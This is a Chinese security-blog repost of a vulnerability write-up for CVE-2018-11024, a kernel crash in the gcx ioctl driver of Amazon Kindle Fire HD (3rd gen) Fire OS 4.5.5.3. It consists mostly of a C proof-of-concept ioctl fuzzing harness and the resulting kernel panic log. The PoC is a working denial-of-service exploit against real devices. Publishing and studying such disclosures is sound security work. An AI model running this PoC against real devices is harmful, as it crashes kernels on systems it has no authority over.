(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

admin 2022年1月6日00:43:01安全博客评论8 views19834字阅读66分6秒阅读模式

一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3的内核组件中的内核模块/omap/drivers/misc/gcx/gcioctl/gcif.c允许攻击者通过设备/ dev上ioctl的参数注入特制参数/ gcioctl使用命令1077435789并导致内核崩溃。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
#include<stdio.h>
#include<string.h> //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h> //write
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdbool.h>

// Socket boilerplate code taken from here: http://www.binarytides.com/server-client-example-c-sockets-linux/

/*
seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blobs
*/
int debug = 1;

typedef struct {
int src_id;
int dst_id;
int offset;
} map_entry_t;

short tiny_vals[18] = {128, 127, 64, 63, 32, 31, 16, 15, 8, 7, 4, 3, 2, 1, 0, 256, 255, -1};
int *small_vals;
int num_small_vals;

// populates small_vals when called
void populate_arrs(int top) {
int num = 1;
int count = 0;
while (num < top) {
//printf("%d\n", num);
num <<= 1;
count += 2;
}
// top
count += 1;
// -1
count += 1;
num_small_vals = count;
num >>= 1;

small_vals = malloc(sizeof(int)*count);
memset(small_vals, 0, count);

int i = 0;
while(num > 1) {
small_vals[i] = num;
i++;
small_vals[i] = num-1;
i++;
num >>= 1;
}
small_vals[i] = 0;
small_vals[i+1] = top;
small_vals[i+2] = top-1;
small_vals[i+3] = -1;
}

// generate a random value of size size and store it in elem.
// value has a weight % chance to be a "small value"
void gen_rand_val(int size, char *elem, int small_weight) {
int i;

if ((rand() % 100) < small_weight) {
// do small thing
unsigned int idx = (rand() % num_small_vals);
printf("Choosing %d\n", small_vals[idx]);
switch (size) {
case 2:
idx = (rand() % 18);
*(short *)elem = tiny_vals[idx];
break;
case 4:
*(int *)elem = small_vals[idx];
break;

case 8:
*(long long*)elem = small_vals[idx];
break;

default:
printf("Damn bro. Size: %d\n", size);
exit(-1);
}
}

else {

for(i=0; i < size; i++) {
elem[i] = (char)(rand()%0x100);
}
}

}

int main(int argc , char *argv[])
{
int num_blobs = 0, num_mappings = 0, i = 0, dev_name_len = 0, j;
unsigned int ioctl_id = 0;
char *dev_name;
void *tmp;
char **ptr_arr;
int *len_arr;
unsigned int seed;

int sockfd , client_sock , c , read_size;
struct sockaddr_in server , client;
int msg_size;
void *generic_arr[264];

// max val for small_vals array
int top = 8192;
int cnt = 0;
// chance that our generics are filled with "small vals"
int default_weight = 50;
populate_arrs(top);
int retest = 1;
goto rerun;



sockfd = socket(AF_INET , SOCK_STREAM , 0);
if (sockfd == -1)
{
printf("Could not create socket");
}
puts("Socket created");

setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));

server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(atoi(argv[1]));

//Bind
if( bind(sockfd,(struct sockaddr *)&server , sizeof(server)) < 0)
{
//print the error message
perror("bind failed. Error");
return 1;
}
puts("bind done");
listen:
// Listen
listen(sockfd , 3);

puts("Waiting for incoming connections...");
c = sizeof(struct sockaddr_in);

// accept connection from an incoming client
client_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t*)&c);
if (client_sock < 0)
{
perror("accept failed");
return 1;
}
puts("Connection accepted");

msg_size = 0;
// Receive a message from client
while( (read_size = recv(client_sock , &msg_size , 4 , 0)) > 0 )
{
// recv the entire message
char *recv_buf = calloc(msg_size, sizeof(char));
if (recv_buf == NULL) {
printf("Failed to allocate recv_buf\n");
exit(-1);
}

int nrecvd = recv(client_sock, recv_buf, msg_size, 0);
if (nrecvd != msg_size) {
printf("Error getting all data!\n");
printf("nrecvd: %d\nmsg_size:%d\n", nrecvd, msg_size);
exit(-1);
}
// quickly save a copy of the most recent data
int savefd = open("/sdcard/saved", O_WRONLY|O_TRUNC|O_CREAT, 0644);
if (savefd < 0) {
perror("open saved");
exit(-1);
}

int err = write(savefd, recv_buf, msg_size);
if (err != msg_size) {
perror("write saved");
exit(-1);
}
fsync(savefd);
close(savefd);
rerun:
if (retest) {
recv_buf = calloc(msg_size, sizeof(char));
int fd = open("/sdcard/saved", O_RDONLY);
if (fd < 0) {
perror("open:");
exit(-1);
}
int fsize = lseek(fd, 0, SEEK_END);
printf("file size: %d\n", fsize);
lseek(fd, 0, SEEK_SET);
read(fd, recv_buf, fsize);
}

char *head = recv_buf;
seed = 0;
//seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blob_len_arr, blobs
memcpy(&seed, head, 4);
head += 4;
memcpy(&ioctl_id, head, 4);
head += 4;
memcpy(&num_mappings, head, 4);
head += 4;
memcpy(&num_blobs, head, 4);
head += 4;
memcpy(&dev_name_len, head, 4);
head += 4;

// srand with new seed
srand(seed);

/* dev name */
dev_name = calloc(dev_name_len+1, sizeof(char));
if (dev_name == NULL) {
printf("Failed to allocate dev_name\n");
exit(-1);
}
memcpy(dev_name, head, dev_name_len);
head += dev_name_len;

/* map */
map_entry_t *map = calloc(num_mappings, sizeof(map_entry_t));
if (map == NULL) {
printf("Failed to allocate map\n");
exit(-1);
}

if (num_mappings != 0) {
memcpy(map, head, num_mappings*sizeof(map_entry_t));
head += num_mappings*sizeof(map_entry_t);
}

/* blobs */

// first create an array to store the sizes themselves
len_arr = calloc(num_blobs, sizeof(int));
if (len_arr == NULL) {
printf("Failed to allocate len_arr\n");
exit(-1);
}

// we'll also want an array to store our pointers
ptr_arr = calloc(num_blobs, sizeof(void *));
if (ptr_arr == NULL) {
printf("Failed to allocate ptr_arr\n");
exit(-1);
}


// copy the blob sizes into our size_arr
for (j=0; j < num_blobs; j++) {
memcpy(&len_arr[j], head, sizeof(int));
head += sizeof(int);
}

// we'll also want memory bufs for all blobs
// now that we have the sizes, allocate all the buffers we need
for (j=0; j < num_blobs; j++) {
ptr_arr[j] = calloc(len_arr[j], sizeof(char));
printf("Sizeof(ptr_arr[%d])=%d\n", j, len_arr[j]);
printf("ptr_arr[%d]=%p\n", j, ptr_arr[j]);

//printf("just added %p to ptr_arr\n", ptr_arr[j]);
if (ptr_arr[j] == NULL) {
printf("Failed to allocate a blob store\n");
exit(-1);
}

// might as well copy the memory over as soon as we allocate the space
memcpy((char *)ptr_arr[j], head, len_arr[j]);
printf("ptr_arr[%d]=\n", j);
for(i=0;i<len_arr[j];i+=4){
printf("0x%08x\n", *(unsigned int *)(ptr_arr[j] + i));
}
printf("\n");

head += len_arr[j];
}

int num_generics = 0;

// time for pointer fixup
for (i=0; i < num_mappings; i++) {
// get out entry
map_entry_t entry = map[i];
// pull out the struct to be fixed up
char *tmp = ptr_arr[entry.src_id];

// check if this is a struct ptr or just a generic one

// just a generic one
if (entry.dst_id < 0) {
// 90% chance we fixup the generic
if ( (rand() % 10) > 0) {
int buf_len = 128;
char *tmp_generic = malloc(buf_len);
memset(tmp_generic, 0, buf_len);
// 95% chance we fill it with data
if ((rand() % 100) > 95) {
// if dst_id is < 0, it's abs value is the element size
int size = -1 * entry.dst_id;
int weight;
// if it's a char or some float, never choose a "small val"
if (size == 1 || size > 8)
weight = 0;
else
weight = default_weight;

for (i=0; i < buf_len; i+=size) {
gen_rand_val(size, &tmp_generic[i], weight);
}
}
generic_arr[num_generics] = tmp_generic;
memcpy(tmp+entry.offset, &tmp_generic, sizeof(void *));
num_generics += 1;
if (num_generics >= 264) {
printf("Code a better solution for storing generics\n");
exit(1);
}
}
}

// a struct ptr, so we have the data
else {
// 1 in 400 chance we don't fixup
if ( (rand() % 400) > 0) {
// now point it to the correct struct/blob
// printf("placing %p, at %p\n", ptr_arr[entry.dst_id], tmp+entry.offset);
memcpy(tmp+entry.offset, &ptr_arr[entry.dst_id], sizeof(void *));
}
}
}

if (debug) {
printf("ioctl_id: %d\n", ioctl_id);
printf("num_mappings: %d\n", num_mappings);
printf("num_blobs: %d\n", num_blobs);
printf("dev_name_len: %d\n", dev_name_len);
printf("dev_name: %s\n", dev_name);
printf("data[]: \n");
//printf("(0x%x)\n", *(int *)&ptr_arr[0]);
printf("(0x%p) : ", &ptr_arr[0]);
printf("(0x%016lx)\n", *(unsigned long int *)ptr_arr[0]);
printf("(0x%p) : ", (&ptr_arr[0]+1*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+1*8));

printf("(0x%p) : ", (&ptr_arr[0]+2*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+2*8));

printf("(0x%p) : ", (&ptr_arr[0]+3*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+3*8));

printf("(0x%p) : ", (&ptr_arr[0]+4*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+4*8));

//printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+5*8));
//printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+6*8));

//printf("(0x%x)\n", (int *)ptr_arr, (int *)ptr_arr);

}

// time for the actual ioctl
//printf("Try to open device %s\n", dev_name);
//fflush(stdout);
int fd = open(dev_name, O_RDONLY);
if (fd < 0) {
perror("open");
exit(-1);
} else {
printf("Open devicd %s successfully.\n", dev_name);
}

//fflush(stdout);
//printf("Try to call ioctl(fd=%d, ioctl_id=%d, ptr_arr=%p)\n", fd, ioctl_id, ptr_arr[0]);
fflush(stdout);
printf("%10d:", cnt++);
if ((ioctl(fd, ioctl_id, ptr_arr[0])) == -1)
perror("ioctl");

else
printf("good hit\n");
close(fd);
printf("device %s closed\n", dev_name);

if (retest)
exit(0);

fflush(stdout);
// okay now free all the shit we alloced
free(recv_buf);
free(dev_name);
if (map != NULL)
free(map);
free(len_arr);
for (i=0; i < num_blobs; i++) {
//printf("%d: free'ing %p\n", i, ptr_arr[i]);
free(ptr_arr[i]);
}
free(ptr_arr);
for (i=0; i < num_generics; i++) {
free(generic_arr[i]);
}

write(client_sock, &msg_size, 4);

msg_size = 0;
}

if(read_size == 0)
{
puts("Client disconnected");
fflush(stdout);
close(client_sock);
goto listen;
}
else if(read_size == -1)
{
perror("recv failed");
}

return 0;
}

崩溃日志

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
[  144.428375] Unable to handle kernel paging request at virtual address d900000c
[ 144.436462] pgd = dcac0000
[ 144.439697] [d900000c] *pgd=00000000
[ 144.443939] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[ 144.450012] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[ 144.457672] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[ 144.465118] PC is at c2dm_l1cache+0x30/0x100
[ 144.469940] LR is at dev_ioctl+0x3f0/0x10c4
[ 144.474670] pc : [<c03187ac>] lr : [<c031782c>] psr: a0000013
[ 144.474670] sp : c2d6be38 ip : 00000000 fp : c2d6be6c
[ 144.487640] r10: 00000000 r9 : d8c0cca8 r8 : 00b8dd90
[ 144.493621] r7 : 00000000 r6 : c2d6bea4 r5 : 00b8dd90 r4 : 388b77c4
[ 144.500915] r3 : d9000004 r2 : 75e0c121 r1 : c2d6bea4 r0 : 00000000
[ 144.508331] Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 144.516418] Control: 10c5387d Table: 9cac004a DAC: 00000015
[ 144.522827]
[ 144.522857] PC: 0xc031872c:
[ 144.527954] 872c e51b2034 e592300c eaffffa5 e30c281c e34c209d e5923000 e3530000 1affffbd
[ 144.538482] 874c eaffffc0 e51b303c e51b1040 e2833001 e51b2034 e1530001 e50b303c e2822010
[ 144.549163] 876c e50b2034 1affff8c eaffff83 c09dc81c e1a0c00d e92ddff0 e24cb004 e24dd00c
[ 144.559844] 878c e3500000 e1a07002 e50b0030 da00000d e0814200 e1a06001 e1a03001 e3a02000
[ 144.570404] 87ac e5930008 e593c004 e2833010 e1530004 e022209c 1afffff9 e3520902 3a000003
[ 144.581085] 87cc e3570002 9a000022 e24bd028 e89daff0 e59f9090 e2818008 e3a0a000 e5963008
[ 144.591735] 87ec e5184008 e3530000 13a05000 1a00000a ea000010 e5181004 e5993024 e0841001
[ 144.602416] 880c e12fff33 e5962008 e2855001 e596300c e1550002 e0844003 2a000006 e2572000
[ 144.612976]
[ 144.612976] LR: 0xc03177ac:
[ 144.618072] 77ac ebf55c15 eaffff35 e3053d8d e3443038 e1510003 1affff30 e1a0200d e3c23d7f
[ 144.628631] 77cc e3c3303f e24b0064 e5933008 e2952038 30d22003 33a03000 e3530000 1a0001a8
[ 144.639160] 77ec e1a01005 e3a02038 ebfcfa90 e3500000 1a00000e e51b2030 e3520001 0a0001cb
[ 144.649780] 780c e3520002 0a0001ee e3520000 1a000007 e51b0064 e3a02000 e24b1060 eb0003d3
[ 144.660369] 782c e51b0064 e24b1060 e51b2030 eb000338 e3a05000 eaffff11 e24b1064 e50b1088
[ 144.670776] 784c e51b0088 e3a01010 ebfd03c1 e3a03004 e50b3064 e5963008 e2952004 30d22003
[ 144.681213] 786c 33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f e3c6603f
[ 144.691528] 788c e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064 e1a01005
[ 144.701995]
[ 144.701995] SP: 0xc2d6bdb8:
[ 144.706878] bdb8 c2d6be24 00b8dd90 c2d6bdec c2d6bdd0 c00084d0 c03187ac a0000013 ffffffff
[ 144.717407] bdd8 c2d6be24 00b8dd90 c2d6be6c c2d6bdf0 c06a5318 c0008370 00000000 c2d6bea4
[ 144.727905] bdf8 75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4 00000000 00b8dd90 d8c0cca8
[ 144.738586] be18 00000000 c2d6be6c 00000000 c2d6be38 c031782c c03187ac a0000013 ffffffff
[ 144.749145] be38 c02ba53c 575b4b92 d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90
[ 144.759796] be58 d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088
[ 144.770355] be78 000ffeff 00000001 c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000
[ 144.781005] be98 c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261
[ 144.791687]
[ 144.791687] FP: 0xc2d6bdec:
[ 144.796661] bdec c0008370 00000000 c2d6bea4 75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4
[ 144.807189] be0c 00000000 00b8dd90 d8c0cca8 00000000 c2d6be6c 00000000 c2d6be38 c031782c
[ 144.817840] be2c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000 00000000 00b8dd90
[ 144.828399] be4c 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c
[ 144.839080] be6c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc c2d6be90 c0207454
[ 144.849761] be8c c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f
[ 144.860290] beac 83b275c7 00000000 00020261 00000000 00000000 00000000 00000000 00000000
[ 144.870971] becc 00000000 00000000 00000000 c02089fc 00000000 dcae46c0 0000000b dcae46c0
[ 144.881652]
[ 144.881652] R1: 0xc2d6be24:
[ 144.886627] be24 c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[ 144.897308] be44 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[ 144.907989] be64 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[ 144.918518] be84 c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[ 144.929199] bea4 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[ 144.939849] bec4 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[ 144.950531] bee4 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[ 144.961059] bf04 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[ 144.971710]
[ 144.971710] R3: 0xd8ffff84:
[ 144.976623] ff84 d8ffff20 d8efb000 00000707 020e40fb d8efb075 d8ffff3c d8efb01c d8ffffa0
[ 144.987213] ffa4 d8ffffa0 d8efb028 ca9788f0 d8ffffb0 d8ffffb0 00000000 bf06e9c8 80000088
[ 144.997772] ffc4 dd2eac00 dd309540 00000000 00000000 00000000 00000000 00000000 00000000
[ 145.008392] ffe4 00000000 00000000 00000000 00000000 00000000 00000000 00000000 ********
[ 145.018798] 0004 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.029327] 0024 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.039886] 0044 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.050384] 0064 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.060913]
[ 145.060913] R6: 0xc2d6be24:
[ 145.066009] be24 c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[ 145.076568] be44 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[ 145.087219] be64 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[ 145.097900] be84 c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[ 145.108459] bea4 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[ 145.118988] bec4 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[ 145.129638] bee4 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[ 145.140319] bf04 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[ 145.150848]
[ 145.150848] R9: 0xd8c0cc28:
[ 145.155944] cc28 d8c0cc28 d8c0cc28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[ 145.166503] cc48 00000000 00000000 d8c0cc50 d8c0cc50 00000000 c0aa5174 c0aa5174 c0aa5148
[ 145.177062] cc68 5aefd94b 00000000 00000000 00000000 d8c0cc80 9ad1f453 00000000 00000000
[ 145.187713] cc88 00200000 00000000 00000000 d8c0cc94 d8c0cc94 dd3b56c0 dd3b56c0 00000000
[ 145.198394] cca8 000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[ 145.208923] ccc8 d8c0cd80 dd3e3e70 00001064 00000001 0fb00000 5aefd94b 2d2b4d13 5aefd94b
[ 145.219573] cce8 2d2b4d13 5aefd94b 2d2b4d13 00000000 00000000 00000000 00000000 00000000
[ 145.230255] cd08 00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0cd24
[ 145.240936] Process executor32 (pid: 3810, stack limit = 0xc2d6a2f8)
[ 145.248016] Stack: (0xc2d6be38 to 0xc2d6c000)
[ 145.253082] be20: c02ba53c 575b4b92
[ 145.262176] be40: d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000
[ 145.271392] be60: c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001
[ 145.280609] be80: c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8
[ 145.289703] bea0: 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000
[ 145.298919] bec0: 00000000 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000
[ 145.308105] bee0: dcae46c0 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08
[ 145.317352] bf00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[ 145.326416] bf20: dcf8c440 c2d6bf0c c2d6a000 00b8dd80 00b8dd90 40385d8d dcae46c0 0000000b
[ 145.335662] bf40: c2d6a000 00000000 c2d6bf64 00000000 00b8dd90 40385d8d dcae46c0 0000000b
[ 145.344879] bf60: c2d6a000 00000000 c2d6bfa4 c2d6bf78 c01365e0 c0135fc4 00000000 00000000
[ 145.354095] bf80: c0013e08 00b8dd80 000121c0 00000000 00000036 c0013e08 00000000 c2d6bfa8
[ 145.363159] bfa0: c0013c60 c0136578 00b8dd80 000121c0 0000000b 40385d8d 00b8dd90 00b8dd90
[ 145.372406] bfc0: 00b8dd80 000121c0 00000000 00000036 00000000 00000000 00000000 bee035f4
[ 145.381622] bfe0: 810100fc bee030f4 00011578 0002b28c 60000010 0000000b 4d6969d9 03020430
[ 145.390686] Backtrace:
[ 145.393829] [<c031877c>] (c2dm_l1cache+0x0/0x100) from [<c031782c>] (dev_ioctl+0x3f0/0x10c4)
[ 145.403228] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[ 145.412658] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[ 145.421874] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 145.431304] r8:c0013e08 r7:00000036 r6:00000000 r5:000121c0 r4:00b8dd80
[ 145.439605] Code: e0814200 e1a06001 e1a03001 e3a02000 (e5930008)
[ 145.450225] Board Information:
[ 145.450225] Revision : 0001
[ 145.450256] Serial : 0000000000000000
[ 145.450256] SoC Information:
[ 145.450256] CPU : OMAP4470
[ 145.450286] Rev : ES1.0
[ 145.450286] Type : HS
[ 145.450286] Production ID: 0002B975-000000CC
[ 145.450286] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[ 145.450317]
[ 145.485900] ---[ end trace 0fe3b4c74b4e9fa7 ]---
[ 145.491149] Kernel panic - not syncing: Fatal exception
[ 145.496917] CPU1: stopping
[ 145.500152] Backtrace:
[ 145.503204] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[ 145.512695] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[ 145.519714] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[ 145.528961] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[ 145.538482] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[ 145.547637] Exception stack(0xd85a5fb0 to 0xd85a5ff8)
[ 145.553466] 5fa0: 41822290 418185e8 00000001 41c95000
[ 145.562561] 5fc0: 418185e8 41687460 4010d0ec 418185e8 4010d038 41689398 7fffffff 401602ec
[ 145.571777] 5fe0: 418191e8 5ba34d10 41609aa8 41609974 200b0010 ffffffff
[ 145.579284] r6:ffffffff r5:200b0010 r4:41609974 r3:41822290
[ 145.586364] CPU0 PC (0) : 0xc003ee38
[ 145.590576] CPU0 PC (1) : 0xc003ee54
[ 145.594635] CPU0 PC (2) : 0xc003ee54
[ 145.598693] CPU0 PC (3) : 0xc003ee54
[ 145.602722] CPU0 PC (4) : 0xc003ee54
[ 145.606781] CPU0 PC (5) : 0xc003ee54
[ 145.610839] CPU0 PC (6) : 0xc003ee54
[ 145.614898] CPU0 PC (7) : 0xc003ee54
[ 145.619110] CPU0 PC (8) : 0xc003ee54
[ 145.623168] CPU0 PC (9) : 0xc003ee54
[ 145.627227] CPU1 PC (0) : 0xc0019b2c
[ 145.631408] CPU1 PC (1) : 0xc0019b2c
[ 145.635467] CPU1 PC (2) : 0xc0019b2c
[ 145.639495] CPU1 PC (3) : 0xc0019b2c
[ 145.643707] CPU1 PC (4) : 0xc0019b2c
[ 145.647766] CPU1 PC (5) : 0xc0019b2c
[ 145.651824] CPU1 PC (6) : 0xc0019b2c
[ 145.656005] CPU1 PC (7) : 0xc0019b2c
[ 145.660064] CPU1 PC (8) : 0xc0019b2c
[ 145.664123] CPU1 PC (9) : 0xc0019b2c
[ 145.668182]
[ 145.669952] Restarting Linux version 3.4.83-gd2afc0bae69 ([email protected]) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[ 145.669982]

FROM :ol4three.com | Author:ol4three

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日00:43:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  (CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞 http://cn-sec.com/archives/720864.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: